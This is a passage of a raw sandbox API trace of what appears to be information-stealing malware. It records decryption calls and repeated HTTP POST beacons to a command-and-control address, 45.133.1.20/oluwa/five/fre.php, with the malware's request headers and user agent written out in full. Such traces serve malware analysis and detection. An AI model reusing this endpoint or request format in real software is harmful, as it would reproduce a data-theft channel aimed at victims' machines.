hHeap=0x6a0000) returned 1 [0293.525] GetProcessHeap () returned 0x6a0000 [0293.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0293.525] closesocket (s=0xaf4) returned 0 [0293.526] GetProcessHeap () returned 0x6a0000 [0293.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0293.526] GetProcessHeap () returned 0x6a0000 [0293.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0293.527] GetProcessHeap () returned 0x6a0000 [0293.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0293.527] GetProcessHeap () returned 0x6a0000 [0293.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0293.547] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1814) returned 0xaf4 [0293.553] Sleep (dwMilliseconds=0xea60) [0293.555] GetProcessHeap () returned 0x6a0000 [0293.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0293.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.556] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.563] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0293.570] GetProcessHeap () returned 0x6a0000 [0293.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0293.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.571] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0293.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.572] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.573] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.573] GetProcessHeap () returned 0x6a0000 [0293.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0293.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.574] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0293.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.580] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0293.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.586] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0293.586] GetProcessHeap () returned 0x6a0000 [0293.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0293.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.587] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.588] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.589] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.590] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.590] GetProcessHeap () returned 0x6a0000 [0293.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0293.590] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0293.591] GetProcessHeap () returned 0x6a0000 [0293.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0293.591] GetProcessHeap () returned 0x6a0000 [0293.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0293.592] GetProcessHeap () returned 0x6a0000 [0293.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0293.592] GetProcessHeap () returned 0x6a0000 [0293.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0293.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.593] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.599] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0293.606] GetProcessHeap () returned 0x6a0000 [0293.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0293.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.607] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0293.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.608] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.611] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.611] GetProcessHeap () returned 0x6a0000 [0293.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0293.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.613] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0293.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.614] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0293.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.615] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0293.615] GetProcessHeap () returned 0x6a0000 [0293.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0293.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.616] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0293.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.618] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0293.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.622] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0293.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.622] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0293.622] GetProcessHeap () returned 0x6a0000 [0293.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0293.622] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0293.623] GetProcessHeap () returned 0x6a0000 [0293.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0293.623] socket (af=2, type=1, protocol=6) returned 0xaf8 [0293.623] connect (s=0xaf8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0293.649] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0293.649] GetProcessHeap () returned 0x6a0000 [0293.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0293.649] GetProcessHeap () returned 0x6a0000 [0293.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da320 [0293.651] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0293.652] wvsprintfA (in: param_1=0x6da320, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0293.652] GetProcessHeap () returned 0x6a0000 [0293.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d8170 [0293.652] GetProcessHeap () returned 0x6a0000 [0293.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0293.653] GetProcessHeap () returned 0x6a0000 [0293.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0293.653] GetProcessHeap () returned 0x6a0000 [0293.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da320 [0293.654] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0293.655] wvsprintfA (in: param_1=0x6da320, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0293.655] GetProcessHeap () returned 0x6a0000 [0293.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0293.655] GetProcessHeap () returned 0x6a0000 [0293.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 [0293.655] send (s=0xaf8, buf=0x6bd460*, len=242, flags=0) returned 242 [0293.656] send (s=0xaf8, buf=0x6bb998*, len=159, flags=0) returned 159 [0293.656] GetProcessHeap () returned 0x6a0000 [0293.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0293.656] recv (in: s=0xaf8, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0293.750] GetProcessHeap () returned 0x6a0000 [0293.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0293.750] GetProcessHeap () returned 0x6a0000 [0293.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0293.751] GetProcessHeap () returned 0x6a0000 [0293.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8170 | out: hHeap=0x6a0000) returned 1 [0293.751] GetProcessHeap () returned 0x6a0000 [0293.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0293.752] closesocket (s=0xaf8) returned 0 [0293.752] GetProcessHeap () returned 0x6a0000 [0293.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0293.752] GetProcessHeap () returned 0x6a0000 [0293.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0293.754] GetProcessHeap () returned 0x6a0000 [0293.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0293.755] GetProcessHeap () returned 0x6a0000 [0293.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0293.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1818) returned 0xaf8 [0293.757] Sleep (dwMilliseconds=0xea60) [0293.761] GetProcessHeap () returned 0x6a0000 [0293.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0293.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.762] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.773] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0293.799] GetProcessHeap () returned 0x6a0000 [0293.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6da980 [0293.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.801] CryptImportKey (in: hProv=0x6bef48, pbData=0x6da980, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0293.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.816] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.818] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.818] GetProcessHeap () returned 0x6a0000 [0293.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da980 | out: hHeap=0x6a0000) returned 1 [0293.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.822] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0293.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.823] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0293.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.832] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0293.832] GetProcessHeap () returned 0x6a0000 [0293.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0293.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.834] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.835] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.836] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.837] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.838] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.838] GetProcessHeap () returned 0x6a0000 [0293.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0293.839] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0293.839] GetProcessHeap () returned 0x6a0000 [0293.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0293.843] GetProcessHeap () returned 0x6a0000 [0293.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0293.844] GetProcessHeap () returned 0x6a0000 [0293.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0293.845] GetProcessHeap () returned 0x6a0000 [0293.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0293.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.846] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.858] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0293.867] GetProcessHeap () returned 0x6a0000 [0293.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0293.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.868] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0293.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.870] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.871] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.871] GetProcessHeap () returned 0x6a0000 [0293.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0293.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.876] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0293.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.877] CryptDestroyKey (hKey=0x6ad020) returned 1 [0293.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.879] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0293.879] GetProcessHeap () returned 0x6a0000 [0293.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0293.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.880] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0293.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.882] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0293.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.887] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0293.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.888] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0293.889] GetProcessHeap () returned 0x6a0000 [0293.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0293.889] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0293.889] GetProcessHeap () returned 0x6a0000 [0293.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0293.889] socket (af=2, type=1, protocol=6) returned 0xafc [0293.889] connect (s=0xafc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0293.913] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0293.913] GetProcessHeap () returned 0x6a0000 [0293.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0293.913] GetProcessHeap () returned 0x6a0000 [0293.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0293.915] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0293.916] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0293.918] GetProcessHeap () returned 0x6a0000 [0293.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da7c8 [0293.918] GetProcessHeap () returned 0x6a0000 [0293.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0293.919] GetProcessHeap () returned 0x6a0000 [0293.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0293.919] GetProcessHeap () returned 0x6a0000 [0293.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0293.920] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0293.921] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0293.921] GetProcessHeap () returned 0x6a0000 [0293.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0293.921] GetProcessHeap () returned 0x6a0000 [0293.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0293.922] send (s=0xafc, buf=0x6bd460*, len=242, flags=0) returned 242 [0293.923] send (s=0xafc, buf=0x6bb998*, len=159, flags=0) returned 159 [0293.923] GetProcessHeap () returned 0x6a0000 [0293.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0293.923] recv (in: s=0xafc, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0294.019] GetProcessHeap () returned 0x6a0000 [0294.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0294.020] GetProcessHeap () returned 0x6a0000 [0294.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0294.026] GetProcessHeap () returned 0x6a0000 [0294.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da7c8 | out: hHeap=0x6a0000) returned 1 [0294.084] GetProcessHeap () returned 0x6a0000 [0294.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0294.085] closesocket (s=0xafc) returned 0 [0294.086] GetProcessHeap () returned 0x6a0000 [0294.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0294.086] GetProcessHeap () returned 0x6a0000 [0294.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0294.087] GetProcessHeap () returned 0x6a0000 [0294.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0294.087] GetProcessHeap () returned 0x6a0000 [0294.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: 